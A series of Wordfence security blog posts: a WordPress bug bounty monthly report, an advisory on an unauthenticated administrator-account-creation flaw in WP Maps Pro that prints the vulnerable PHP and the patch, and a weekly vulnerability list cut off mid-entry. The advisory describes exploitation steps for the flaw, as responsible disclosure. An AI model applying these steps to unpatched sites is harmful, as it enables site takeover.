In this blog post, we detailed an Unauthenticated Privilege Escalation vulnerability within the Kirki plugin affecting versions 6.0.0 through 6.0.6. This vulnerability allows unauthenticated attackers to take over user accounts, including administrator accounts, by exploiting the plugin’s password reset process so that the reset link is sent to an email address they control. The vulnerability has been fully addressed in version 6.0.7 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of Kirki as soon as possible considering the critical nature of this vulnerability.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

The post Unauthenticated Privilege Escalation Vulnerability Patched in Kirki WordPress Plugin appeared first on Wordfence.

Wordfence Bug Bounty Program Monthly Report – March 2026

Simon Browning — Fri, 29 May 2026 16:41:54 +0000

In March 2026, the Wordfence Bug Bounty Program received 1718 vulnerability submissions from our growing community of security researchers working to improve the overall security posture of the WordPress ecosystem. These submissions are reviewed, triaged, and processed by the Wordfence Threat Intelligence team, with validated vulnerabilities responsibly disclosed to vendors, often through the Wordfence Vulnerability Management Portal – a free service for all WordPress vendors, and protected through the Wordfence Firewall where appropriate.

Our mission with the Wordfence Bug Bounty Program is to engage the broader security community in identifying and responsibly disclosing vulnerabilities in WordPress plugins and themes, so we can work with vendors to get them patched before attackers discover them. This collaborative effort enables Wordfence to accelerate patch adoption, provide early protection to millions of websites, and ensure that high-quality vulnerability intelligence reaches the WordPress ecosystem as efficiently as possible. It also ensures that we are able to remediate vulnerabilities before attackers are able to discover them and start exploiting them. That is why we reward researchers for valid submissions, and why we remain committed to processing every report with transparency, accuracy, and urgency.

Join the Wordfence Bug Bounty Program

Help secure the WordPress ecosystem while earning rewards for your security research.

We’re actively seeking skilled researchers to identify vulnerabilities in WordPress plugins and themes, with prompt payments and transparent processes.

Start Your Security Research Journey

As the most comprehensive and highest-quality WordPress vulnerability program, the Wordfence Bug Bounty Program plays a critical role in helping site owners, developers, and hosting providers stay ahead of emerging threats at all stages of the open source lifecycle.

In this report, we highlight key metrics of the Bug Bounty Program from March 2026, recognize the researchers contributing to WordPress security, and provide insight into the vulnerabilities uncovered and addressed.

Table of Contents
Program Submission Highlights – March 2026
WordPress Software Vulnerability Submission Insights – March 2026
Bounty Insights – March 2026
Top WordPress Security Researchers – March 2026
Current WordPress Bug Bounty Program Promotions
Critical WordPress Software Vulnerability Highlights – March 2026
Conclusion

If you’re interested in joining the program or learning more about how we responsibly manage disclosures and protect WordPress users, visit the Bug Bounty Program page.

WordPress Software Vendors – Sign Up For Free Centralized Management of all Vulnerabilities in Your Software

Wordfence provides a completely free vulnerability management portal for WordPress Software vendors to easily track and manage all vulnerabilities submitted to the Wordfence Bug Bounty Program, and added to the Wordfence Intelligence Vulnerability Database.

This portal streamlines and enhances the repsonsible disclosure process so you can secure your customers faster.

Get Started With the Vendor Portal Today

Program Submission Highlights – March 2026

The Wordfence Bug Bounty Program is designed for momentum: rapid triage of critical issues, clear feedback, and fast, fair rewards. Each submission moves through our standardized workflow of validation, vendor coordination, patch verification, and firewall coverage where applicable, so research translates into real-world protection quickly.

Real-Time Protection Impact

Every vulnerability disclosed through this program is a threat you don’t have to face blindly. Our researchers uncover and report vulnerabilities before they can be exploited, and Wordfence Premium, Care and Response users get protection in real-time through our firewall. Free users are protected in 30 days.

Behind the numbers is meaningful impact for site owners. The issues surfaced here inform new firewall rules, strengthen our detection logic, and help vendors ship safer releases. If you’re new to bounty hunting, this is a great place to start: we publish scope clearly, pay promptly, and credit the work that keeps WordPress secure.

Total Submissions

1718

+59.4% from last month

Active Researchers

321

+51.4% from last month

High Threat

+133.3% from last month

Common & Dangerous

+56.0% from last month

WAF Rules Released

-44.4% from last month

Vulnerability Focus Areas

High Threat Vulnerabilities: Issues that could result in full site compromise, such as Arbitrary File Uploads or Remote Code Execution. Must be exploitable by unauthenticated or low-level authenticated attackers with software having 25+ active installations.
Common & Dangerous: Stored Cross-Site Scripting and SQL Injection vulnerabilities exploitable by unauthenticated or low-level authenticated attackers. Software must have 500+ active installations.

Bounty Insights – March 2026

Our research powers real investment back into the community. This section totals bounties and bonuses paid for the month and showcases standout findings. Our philosophy is simple: reward high-quality, responsibly disclosed research that measurably reduces risk for WordPress users.

Total Bounties Awarded

$62,174

March 2026

Average Bounty Per Submission

$195.52

Per validated in-scope submission

Highest Single Bounty

$3,726

Top researcher reward

Top 5 Bounties Awarded

Vulnerability	Bounty	Install Count
Perfmatters <= 2.5.9.1 – Authenticated (Subscriber+) Arbitrary File Deletion via ‘delete’ Parameter	$3,726.00	200,000
Avada Builder <= 3.15.2 – Authenticated (Subscriber+) Arbitrary File Read via ‘custom_svg’ Shortcode Parameter	$3,386.00	968,000
MW WP Form <= 5.1.0 – Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir	$3,105.00	200,000
Breeze Cache <= 2.4.4 – Unauthenticated Arbitrary File Upload via fetch_gravatar_from_remote	$2,691.00	400,000
Gravity Forms <= 2.10.0 – Unauthenticated Stored Cross-Site Scripting via Product Option	$2,304.00	1,000,000

Want to earn more? Read the scope carefully, target high-threat classes, and include clear reproduction steps with proof of impact. We pay promptly on validated issues, and bonus multipliers may apply during limited-time promotions and challenges.

WordPress Software Vulnerability Submission Insights – March 2026

This section breaks down how reports map to our program outcomes. What’s in scope, what isn’t, and where the highest security impact typically sits. We highlight the most common in-scope vulnerability classes and the categories that yielded the largest rewards so researchers can focus their efforts where they matter most.

Authentication level and exploit preconditions drive risk and reward through our program. Unauthenticated and low-privilege paths tend to have outsized impact because they scale to more real-world compromise. Use these insights to prioritize your testing strategy and maximize both security value and bounty potential.

Total Number of Vulnerabilities Considered In Scope, Out of Scope, Rejected, or Duplicate

In Scope	Out of Scope	Rejected	Duplicate
318	306	748	346

Top 10 Most Commonly Submitted In-Scope Vulnerability Types

The most frequently submitted vulnerability types highlight current testing focus areas across the researcher community. These patterns often reflect both ease of discovery and prevalence in the WordPress ecosystem.

Vulnerability Type	Total Submissions	Total Rewards	Avg. Reward
CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)	123	$15,652.00	$127.25
CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)	33	$5,575.00	$168.94
CWE 862: Missing Authorization	27	$5,996.00	$222.07
CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)	11	$11,687.00	$1,062.45
CWE 639: Authorization Bypass Through User-Controlled Key	10	$1,325.00	$132.50
CWE 434: Unrestricted Upload of File with Dangerous Type	9	$5,221.00	$580.11
CWE 918: Server-Side Request Forgery (SSRF)	6	$559.00	$93.17
CWE 269: Improper Privilege Management	5	$2,236.00	$447.20
CWE 863: Incorrect Authorization	5	$274.00	$54.80
CWE 94: Improper Control of Generation of Code (‘Code Injection’)	4	$3,169.00	$792.25

Top 10 Highest Rewarded In-Scope Vulnerability Types

While some vulnerabilities appear frequently, others command premium rewards. This breakdown shows which vulnerability classes generated the highest total payouts across all submissions in those categories, indicating both severity and exploitability value.

Vulnerability Type	Total Rewards	Total Submissions	Avg. Reward
CWE 79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)	$15,652.00	122	$127.25
CWE 22: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)	$11,687.00	11	$1,062.45
CWE 862: Missing Authorization	$5,996.00	27	$222.07
CWE 89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)	$5,575.00	33	$168.94
CWE 434: Unrestricted Upload of File with Dangerous Type	$5,221.00	9	$580.11
CWE 36: Absolute Path Traversal	$3,846.00	2	$1,923.00
CWE 94: Improper Control of Generation of Code (‘Code Injection’)	$3,169.00	4	$792.25
CWE 269: Improper Privilege Management	$2,236.00	5	$447.20
CWE 306: Missing Authentication for Critical Function	$1,950.00	1	$1,950.00
CWE 200: Exposure of Sensitive Information to an Unauthorized Actor	$1,466.00	2	$733.00

In-Scope Vulnerability Distribution by Authentication Level

Authentication requirements directly impact real-world exploitability. Unauthenticated and subscriber-level vulnerabilities typically pose greater risk, reflected in both our prioritization and reward structure.

Authentication Level	Total Vulnerabilities	Avg. Reward
Unauthenticated	124	$385.01
Contributor	81	$32.44
Subscriber	57	$342.89
Author	24	$77.85
Custom	8	$196.29
Unauthenticated – UI Required	8	$167.38

Vulnerability Submission Install Count Spread

Install counts help us gauge blast radius. Higher install bases can move a finding into higher priority and often correlate with stronger payouts, while smaller-but-critical ecosystems still qualify when the exploitability and impact warrant it.

Install Range	Total Vulnerabilities	Average CVSS	Avg. Reward
1,000–49,999	101	7.06	$148.49
100,000–999,999	78	6.59	$440.67
50,000–99,999	59	6.49	$102.79
Off-Repo	38	8.27	$387.37
1,000,000–4,999,999	19	6.19	$426.56
0–499	16	8.68	$43.38
500–999	6	6.97	$39.60
5,000,000+	2	5.85	$544.00

Top WordPress Security Researchers – March 2026

Security is a team sport, and this leaderboard celebrates the people raising the bar. We recognize contributors by valid in-scope submissions, overall earnings, and average severity to highlight different paths to excellence.

Top 5 Researchers based on Volume of In-Scope Submissions

Volume leaders demonstrate consistent vulnerability discovery across diverse targets. These researchers excel at systematic testing and maintaining high validation rates.

Researcher	Total Submissions	Avg. Reward
Muhammad Yudha – DJ	18	$13.94
Osvaldo Noe Gonzalez Del Rio (Os)	18	$116.11
Dmitrii Ignatyev	13	$190.00
daroo	13	$384.08
h0xilo	12	$619.58

Top 5 Researchers Based on Average CVSS of In-Scope Submissions

Quality over quantity defines these researchers who consistently identify high-severity vulnerabilities. Their average CVSS scores reflect expertise in finding critical security gaps.

Researcher	Average CVSS	Total Submissions	Avg. Reward
Alexis Lafontaine	9.80	1	$65.00
Wannes Verwimp	9.80	1	$488.00
David Brown	9.80	1	$1,950.00
kiemtiendinhau	9.80	1	$683.00
0xd4rk5id3	9.63	6	$440.00

Top 5 Researchers Based On Total Bounties Earned

Combining volume with severity, these top earners maximized their impact and rewards through strategic vulnerability research and comprehensive reporting.

Researcher	Total Earned	Total Submissions	Avg. Reward
h0xilo	$7,435.00	12	$619.58
ISMAILSHADOW	$5,250.00	2	$2,625.00
daroo	$4,993.00	13	$384.08
Rafie Muhammad	$4,453.00	2	$2,226.50
bashu	$4,379.00	9	$486.56

Researchers Promoted to the Next Tier

Congratulations to the following researchers who have unlocked the next tier! Tier promotions reflect sustained performance, precision, and professionalism in disclosure. Advancing unlocks higher caps, faster reviews, and more visibility. If you’re climbing the ranks, focus on high risk vulnerabilities, keep reports crisp, attach working PoCs, and include mitigation notes vendors can ship quickly.

Elite Researcher Tier (1337)

0 researchers advanced to elite status

No Elite Researcher Promotions

No researchers advanced to elite (1337) status this month

Resourceful Researcher Tier

0 researchers advanced to resourceful status

No Resourceful Researcher Promotions

No researchers advanced to resourceful status this month

Current WordPress Bug Bounty Program Promotions

As part of our Bug Bounty Program, we regularly launch special promotions that boost bounty rewards and expand research scope. These initiatives are designed to reinforce our mission: delivering the highest quality vulnerability intelligence while encouraging researchers to focus on the discoveries that have the greatest positive impact on the WordPress ecosystem.

At the same time, we also look for promotions that give researchers opportunities to sharpen their skills, take on new challenges, and continue growing into the best of the best in WordPress security research. We often supplement these with educational material for researchers to learn and apply their skills during these promotions.

Below, you’ll find details on all currently active challenges—including timelines and a quick overview of each promotion.

No promotions currently running.

New to promotions? Start by confirming the software and version range are in scope, validate exploitability on a clean test environment, and submit with clear steps, affected code paths, and impact. Promotions are perfect opportunities for both new and seasoned researchers to maximize earnings while driving faster patch adoption. And remember, you can always check what’s in-scope and out-of-scope by using the Wordfence bounty estimator.

Critical WordPress Software Vulnerability Highlights – March 2026

These case studies spotlight high-impact vulnerabilities uncovered through the program, why they matter, and how quickly protection rolled out. We share technical detail to help researchers learn, vendors harden code, and users understand why timely updates aren’t optional.

If you maintain a site, update to the patched versions listed and ensure Wordfence is active so you benefit from new firewall coverage as it ships. If you’re a researcher, use these write-ups to inform your hunt: patterns repeat, and past root causes often reappear in adjacent code.

800,000 WordPress Sites Affected by Arbitrary File Read Vulnerability in Smart Slider 3 WordPress Plugin

Smart Slider 3 <= 3.5.1.33 – Authenticated (Subscriber+) Arbitrary File Read via actionExportAll

Submitted by:
Dmitrii Ignatyev

Bounty Awarded:
$2,208.00

Technical Details:

The Smart Slider 3 plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 3.5.1.33 via the ‘actionExportAll’ function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.

Read the complete vulnerability analysis

400,000 WordPress Sites Affected by Unauthenticated SQL Injection Vulnerability in Ally WordPress Plugin

Ally – Web Accessibility & Usability <= 4.0.3 – Unauthenticated SQL Injection via URL Path

Submitted by:
Drew Webber (mcdruid)

Bounty Awarded:
$800.00

Technical Details:

The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3. This is due to insufficient escaping on the user-supplied URL parameter in the `get_global_remediations()` method, where it is directly concatenated into an SQL JOIN clause without proper sanitization for SQL context. While `esc_url_raw()` is applied for URL safety, it does not prevent SQL metacharacters (single quotes, parentheses) from being injected. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via time-based blind SQL injection techniques. The Remediation module must be active, which requires the plugin to be connected to an Elementor account.

Read the complete vulnerability analysis

30,000 WordPress Sites Affected by Authentication Bypass Vulnerability in Tutor LMS Pro WordPress Plugin

Tutor LMS Pro <= 3.9.5 – Authentication Bypass via Social Login

Submitted by:
Phat RiO

Bounty Awarded:
$1,502.00

Technical Details:

The Tutor LMS Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.9.5 via the Social Login addon. This is due to the plugin failing to verify that the email provided in the authentication request matches the email from the validated OAuth token. This makes it possible for unauthenticated attackers to log in as any existing user, including administrators, by supplying a valid OAuth token from their own account along with the victim’s email address.

Read the complete vulnerability analysis

Conclusion

WordPress thrives when researchers, vendors, hosts, and site owners pull in the same direction. By funding high-quality research, coordinating responsible disclosure, and shipping firewall rules at scale, Wordfence turns findings into protection for millions of sites.

If you’re a researcher, join the program and submit your next report. If you’re a site owner, update early and often, and run Wordfence to stay ahead of emerging threats. If you’re a vendor, sign up for the vulnerability management portal to receive real-time notifications when new vulnerabilities are reported in your software. Together, we make the WordPress ecosystem safer.

The post Wordfence Bug Bounty Program Monthly Report – March 2026 appeared first on Wordfence.

15,000 WordPress Sites Affected by Administrator Account Creation Vulnerability in WP Maps Pro WordPress Plugin

Simon Browning — Thu, 28 May 2026 19:43:15 +0000

On March 24th, 2026, we received a submission for an Unauthenticated Administrator Account Creation vulnerability in WP Maps Pro, a WordPress plugin with more than 15,000 sales. This vulnerability makes it possible for unauthenticated attackers to create new administrator accounts on the affected sites, leading to complete site takeover.

Props to David Brown who discovered and responsibly reported this vulnerability through the Wordfence Bug Bounty Program. This researcher earned a bounty of $1,950.00 for this discovery. Our mission is to secure WordPress through defense in depth, which is why we are investing in quality vulnerability research and collaborating with researchers of this caliber through our Bug Bounty Program. We are committed to making the WordPress ecosystem more secure through the detection and prevention of vulnerabilities, which is a critical element to the multi-layered approach to security.

Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on May 18, 2026. Sites using the free version of Wordfence will receive the same protection 30 days later on June 17, 2026.

Since we were unable to find direct contact information for the vendor, we escalated this report to the Envato security team on May 16, 2026, who then forwarded it to the vendor.

We urge users to update their sites to the latest patched version of WP Maps Pro, version 6.1.1 at the time of this publication, as soon as possible.

Vulnerability Summary from Wordfence Intelligence

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-8732

Affected Version(s)
<= 6.0.4

Patched Version
6.1.1

Affected Software

WP Maps Pro [wp-google-map-gold]

Researcher

David Brown

The WP Maps Pro plugin for WordPress is vulnerable to Privilege Escalation via Administrator Account Creation in all versions up to, and including, 6.1.0. This is due to the wpgmp_temp_access_ajax AJAX action being registered with wp_ajax_nopriv_ and protected only by a nonce check using the fc-call-nonce nonce, which is publicly embedded into every frontend page via wp_localize_script as the nonce field of the wpgmp_local JavaScript object, rendering the check ineffective as an access control mechanism. This makes it possible for unauthenticated attackers to invoke the wpgmp_temp_access_support handler with check_temp=false, which unconditionally creates a new WordPress user with the hardcoded role of administrator via wp_insert_user() and returns a magic login URL that, when visited, calls wp_set_auth_cookie() to fully authenticate the attacker as the newly created administrator, resulting in complete site takeover.

Technical Analysis

WP Maps Pro is a WordPress plugin that enables site owners to embed customizable Google Maps with markers, categories, and advanced location features. As part of its support tooling, the plugin exposes a “temporary access” feature designed to allow vendor support staff to log in to a customer’s site when troubleshooting is required.

Examining the code shows that the plugin uses the wpgmp_temp_access_ajax_callback() function in the WPGMP_Google_Maps_Pro class to handle temporary access generation.

function wpgmp_temp_access_ajax_callback(){
    check_ajax_referer( 'fc-call-nonce', 'nonce' );
    $temp_access = new WPGMP_Temp_Access();
    $response = $temp_access->wpgmp_temp_access_support();

    wp_send_json($response);

    exit();
}

Although this function is protected with a nonce check, the nonce can unfortunately be obtained by unauthenticated users. Additionally, there was no capability check in the vulnerable version. This makes it possible for unauthenticated attackers to invoke the AJAX action.

Then, the wpgmp_temp_access_support() function in the WPGMP_Temp_Access class is invoked, which then creates an administrator user.

public static function wpgmp_temp_access_support() {

	$response = array();

    if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') {
        
        
        $username = 'fc_user_' . uniqid();;
        $email = 'support@flippercode.com';
        $role = 'administrator';

        $result = self::fc_create_new_user($username, $email, $role);

        if (is_numeric($result)) {
            update_user_meta( $result, '_wpgmp_access_token', self::generate_wpgmp_access_token( $result ) );
            $access_link = self::generate_login_link($result);
            update_user_meta( $result, '_wpgmp_access_url', $access_link );
            $response['url'] = $access_link;
        } else {
            $response['error'] = $result;
        }
    }else if( isset($_POST['check_temp']) && $_POST['check_temp'] == 'true' ){
        $user = get_user_by('email','support@flippercode.com');
		if ($user) {
		    $user_id = $user->ID;
		    if (wp_delete_user($user_id)) {
			    $meta_keys_to_delete = array('_wpgmp_access_token', '_wpgmp_access_url');

			    foreach ($meta_keys_to_delete as $meta_key) {
			        delete_user_meta($user_id, $meta_key);
			    }
			    $response['deleted'] = true;

			}

		}
        
        
    }
    return $response;
}

When the request is made with a check_temp parameter set to false, the function creates a new WordPress user via wp_insert_user() with the hardcoded role of administrator, a randomly generated username, and the hardcoded email address support@flippercode.com. The function then generates a “magic login URL” using generate_login_link(), stores it as user meta, and returns it in the response body.

When the attacker visits the returned URL, the plugin calls wp_set_auth_cookie() to fully authenticate the visitor as the newly created administrator, without requiring a password or any further verification. As a result, an attacker gains full administrator-level control over the site and can install malicious plugins, modify themes, inject backdoors, exfiltrate data, or deploy webshells for persistent access.

As with all privilege escalation vulnerabilities, this can lead to complete site compromise.

The Patch

The vendor patched this issue by adding a current_user_can( 'manage_options' ) capability check to the wpgmp_temp_access_ajax_callback() function, which restricts the endpoint to authenticated administrators only:

function wpgmp_temp_access_ajax_callback(){
    // 1. Only allow logged-in administrators
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'error' => 'Unauthorized' ), 403 );
        exit();
    }
    
    check_ajax_referer( 'fc-call-nonce', 'nonce' );
    $temp_access = new WPGMP_Temp_Access();
    $response = $temp_access->wpgmp_temp_access_support();

    wp_send_json($response);

    exit();
}

Wordfence Firewall

The following graphic demonstrates the steps to exploitation an attacker might take and at which point the Wordfence firewall would block an attacker from successfully exploiting the vulnerability.

Disclosure Timeline

March 24, 2026 – We received the submission for the Unauthenticated Administrator Account Creation vulnerability in WP Maps Pro via the Wordfence Bug Bounty Program.
May 16, 2026 – We validated the report and confirmed the proof-of-concept exploit. As we were unable to locate a direct contact for the vendor, we escalated the report to the Envato security team, who forwarded it to the vendor on our behalf.
May 18, 2026 – Wordfence Premium, Care, and Response users received a firewall rule to provide added protection against any exploits that may target this vulnerability.
May 20, 2026 – The fully patched version of the plugin, 6.1.1, was released.
June 17, 2026 – Wordfence Free users will receive the same protection.

Conclusion

In this blog post, we detailed an Unauthenticated Administrator Account Creation vulnerability within the WP Maps Pro plugin affecting all versions up to, and including, 6.1.0. This vulnerability allows unauthenticated threat actors to create new administrator accounts and gain full control of the affected site. The vulnerability has been fully addressed in version 6.1.1 of the plugin.

We encourage WordPress users to verify that their sites are updated to the latest patched version of WP Maps Pro as soon as possible considering the critical nature of this vulnerability.

If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.

The post 15,000 WordPress Sites Affected by Administrator Account Creation Vulnerability in WP Maps Pro WordPress Plugin appeared first on Wordfence.

Wordfence Intelligence Weekly WordPress Vulnerability Report (May 18, 2026 to May 24, 2026)

Simon Browning — Thu, 28 May 2026 17:38:30 +0000

Last week, there were 99 vulnerabilities disclosed in 87 WordPress Plugins and 1 WordPress Theme that have been added to the Wordfence Intelligence Vulnerability Database, and there were 68 Vulnerability Researchers that contributed to WordPress Security last week. Review those vulnerabilities in this report now to ensure your site is not affected.

Click here to sign-up for our mailing list to receive weekly vulnerability reports like this and important WordPress Security reports in your inbox the moment they are published.

New Firewall Rules Deployed Last Week

The team rolled out enhanced protection via firewall rules for the following vulnerabilities in real-time to our Premium, Care, and Response customers last week:

WAF-RULE-915 – Data redacted while we work with the vendor on a patch.

Total Unpatched & Patched Vulnerabilities Last Week

Patch Status	Number of Vulnerabilities
Patched	63
Unpatched	36

Total Vulnerabilities by CVSS Severity Last Week

Severity Rating	Number of Vulnerabilities
Medium Severity	65
High Severity	24
Critical Severity	10

Total Vulnerabilities by CWE Type Last Week

Vulnerability Type by CWE	Number of Vulnerabilities
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)	28
Missing Authorization	18
Cross-Site Request Forgery (CSRF)	13
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)	11
Improper Privilege Management	8
Unrestricted Upload of File with Dangerous Type	5
Authorization Bypass Through User-Controlled Key	4
Exposure of Sensitive Information to an Unauthorized Actor	4
Server-Side Request Forgery (SSRF)	2
Deserialization of Untrusted Data	1
Improper Authentication	1
Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’)	1
Improper Neutralization of Special Elements in Output Used by a Downstream Component (‘Injection’)	1
Incorrect Privilege Assignment	1
Relative Path Traversal	1

Researchers That Contributed to WordPress Security Last Week

Researcher Name	Number of Vulnerabilities
Muhammad Nur Ibnu Hubab	14
h0xilo	5
hhhai	4
Abdulsamad Yusuf (0xVenus)	3
zaim	3
Osvaldo Noe Gonzalez Del Rio (Os)	3
theviper17y	3
Athiwat Tiprasaharn (Jitlada)	2
daroo	2
Dmitrii Ignatyev	2
0xd4rk5id3	2
Que Thanh Tuan	2
Julian Chibuike Nwadinobi (Wackydawg)	2
BIMA IKHSAN	2
snr	1
0x61626390	1
Z3no	1
Thanh Toan Bui	1
oolongeya	1
Rapid0nion	1
Phat RiO	1
Evan NR	1
Tarcísio Luchesi De Almeida Silva (Poystick)	1
Ankit Patel	1
darkmode	1
Nos1x0	1
Joe Bruno	1
Bao Luu Gia Nguyen	1
Tiago Ventura (perses)	1
Md. Moniruzzaman Prodhan (NomanProdhan)	1
Kitch	1
Saleh Elsayed (0xManticore)	1
Tin Pham (TF1T)	1
Trong Pham (dtro)	1
Hao Ngo	1
Doan Dinh Van (DinhVan52)	1
MD. TAREQ AHAMED JONY (itztrq)	1
Itthidej Aramsri (Boeing777)	1
Nguyen Tran Tuan Dung (domiee13)	1
Leonid Semenenko (lsemenenko)	1
Webbernaut	1
Nguyen Ngoc Duc (duc193)	1
walow	1
Van Tho Huynh (l0gs3c)	1
t0ann9uy3n	1
Kazuma Matsumoto	1
endy	1
BaroHaf	1
Peng Zhou	1
Ren Voza	1
Rafie Muhammad	1
Legion Hunter	1
Patryk Siewert	1
Bao – BlueRock	1
Nabil Irawan	1
Hunter Jensen (skid)	1
at1as	1
kudasav	1
momopon1415	1
Nguyen Ba Khanh	1
Nguyen Dinh Hai (HaiND)	1
zakaria	1
sorawautsukushiii	1
Azril Fathoni (kiseki)	1
Bas Albers	1
nudien udin	1
nudien	1
Wannes Verwimp	1

WordPress Plugins with Reported Vulnerabilities Last Week

Software Name	Software Slug
Account Switcher	account-switcher
Active Products Tables for WooCommerce. Use constructor to create tables	profit-products-tables-for-woocommerce
AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress	acymailing
Advanced Database Cleaner – Premium	advanced-database-cleaner-premium
AI Chatbot & Workflow Automation by AIWU	ai-copilot-content-generator
Alfie – Feed Plugin	alfie-the-productfeedtool-wp-plugin
All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic	all-in-one-seo-pack
Amazon Scraper	amazon-scraper
Anomify AI – Anomaly Detection and Alerting	anomify
Appointment Booking Plugin for WooCommerce – WpBookingly \| All-in-One Service Manager	service-booking-manager
AudioIgniter Music Player	audioigniter
Avada (Fusion) Builder	fusion-builder
Bigfishgames Syndicate	bigfishgames-syndicate
BLOGCHAT Chat System	blogchat-chat-system
BookingPress Appointment Booking Pro	bookingpress-appointment-booking-pro
Boost	boost
Bottom Bar	bottom-bar
Broadstreet	broadstreet
CBX 5 Star Rating & Review	cbxscratingreview
Child Height Predictor by Ostheimer	child-height-predictor
Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe	contest-gallery
Correct Prices	correct-prices
Cost of Goods by PixelYourSite	pixel-cost-of-goods
Creative Mail – Easier WordPress & WooCommerce Email Marketing	creative-mail-by-constant-contact
Ditty – Responsive News Tickers, Sliders, and Lists	ditty-news-ticker
Divi Form Builder	divi-form-builder
Draft List	simple-draft-list
E2Pdf – Export Pdf Tool for WordPress	e2pdf
Easy Elements for Elementor – Addons & Website Templates	easy-elements
EventPrime – Events Calendar, Bookings and Tickets	eventprime-event-calendar-management
Faces of Users	faces-of-users
FluentCRM – Email Newsletter, Automation, Email Marketing, Email Campaigns, Optins, Leads, and CRM Solution	fluent-crm
Games Catalog	game-catalog
General Options	general-options
Gift Cards For WooCommerce Pro	giftware
GSheet For Woo Importer	import-products-from-gsheet-for-woo-importer
HT Contact Form – Drag & Drop Form Builder for WordPress	ht-contactform
Image Photo Gallery Final Tiles Grid	final-tiles-grid-gallery-lite
Infility Global	infility-global
JaviBola Custom Theme Test	javibola-custom-theme
KIA Subtitle	kia-subtitle
Kirki – Freeform Page Builder, Website Builder & Customizer	kirki
LJ comments import: reloaded	lj-comments-import-reloaded
Location Weather – WordPress Weather Forecast, AQI, Temperature and Weather Widget	location-weather
Logo Manager For Enamad	logo-manager-for-enamad
Mail Mint – Email Marketing, Newsletter, Email Automation & WooCommerce Emails	mail-mint
MasterStudy LMS WordPress Plugin – for Online Courses and Education	masterstudy-lms-learning-management-system
miniOrange OTP Login, Verification and SMS Notifications	miniorange-otp-verification
MotoPress Hotel Booking	motopress-hotel-booking-lite
Nexa Blocks – Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE	nexa-blocks
Oliver POS – WooCommerce POS for iPhone, iPad & Android	oliver-pos
PDF for Elementor Forms + Drag And Drop Template Builder	pdf-for-elementor-forms
Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery	nextgen-gallery
Piotnet Addons For Elementor Pro	piotnet-addons-for-elementor-pro
Piotnet Forms	piotnetforms-pro
PowerPress Podcasting plugin by Blubrry	powerpress
Property Hive	propertyhive
ProSolution WP Client	prosolution-wp-client
Quads Ads Manager for Google AdSense	quick-adsense-reloaded
Read More & Accordion	expand-maker
Remove Yellow BGBOX	remove-yellow-bgbox
Sentence To SEO (keywords, description and tags)	sentence-to-seo
Slider by Soliloquy – Responsive Image Slider for WordPress	soliloquy-lite
Slider Revolution	revslider
SponsorMe	sponsorme
Sticky	sticky
The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce	the-plus-addons-for-elementor-page-builder
The Ultimate Video Player For WordPress – by Presto Player	presto-player
TypeSquare Webfonts for ConoHa	ts-webfonts-for-conoha
VatanSMS WP SMS	wp-sms-vatansms-com
Vedrixa Forms – User Registration Form, Signup Form & Drag & Drop Form Builder	vedrixa-forms-registration-builder
VikBooking Hotel Booking Engine & PMS	vikbooking
Visualizer: Tables and Charts Manager for WordPress	visualizer
Widget Context	widget-context
Wishlist Member	wishlist-member-x
WooCommerce PayPal Payments	woocommerce-paypal-payments
Word 2 Cash	word-2-cash
WOW Styler for CF7 – Visual Styler for Contact Form 7 Forms	cf7-styler
WP Activity Log	wp-security-audit-log
WP Blockade – Visual Page Builder	wp-blockade
WP ERP Pro	erp-pro
WP Job Portal – AI-Powered Recruitment System for Company or Job Board website	wp-job-portal
WPB Floating Menu or Categories – Sticky Floating Side Menu & Categories with Icons	wpb-floating-menu-or-categories
wpForo Forum	wpforo
Xpro Addons — 140+ Widgets for Elementor	xpro-elementor-addons
YITH WooCommerce Product Add-Ons	yith-woocommerce-product-add-ons
診断ジェネレータ作成プラグイン	os-diagnosis-generator

WordPress Themes with Reported Vulnerabilities Last Week

Software Name	Software Slug
FastX	fastx

Vulnerability Details

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-6279

Patch Status
Patched

Published
May 20, 2026

Affected Software

Avada (Fusion) Builder [fusion-builder]

Researchers

Tin Pham (TF1T)

Trong Pham (dtro)

Hao Ngo

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-6960

Patch Status
Patched

Published
May 21, 2026

Affected Software

BookingPress Appointment Booking Pro [bookingpress-appointment-booking-pro]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-7637

Patch Status
Patched

Published
May 19, 2026

Affected Software

Boost [boost]

Researcher

CVSS Rating
9.8 (Critical)

CVE-ID

CVE-2026-5118

Patch Status
Patched

Published
May 20, 2026

Affected Software

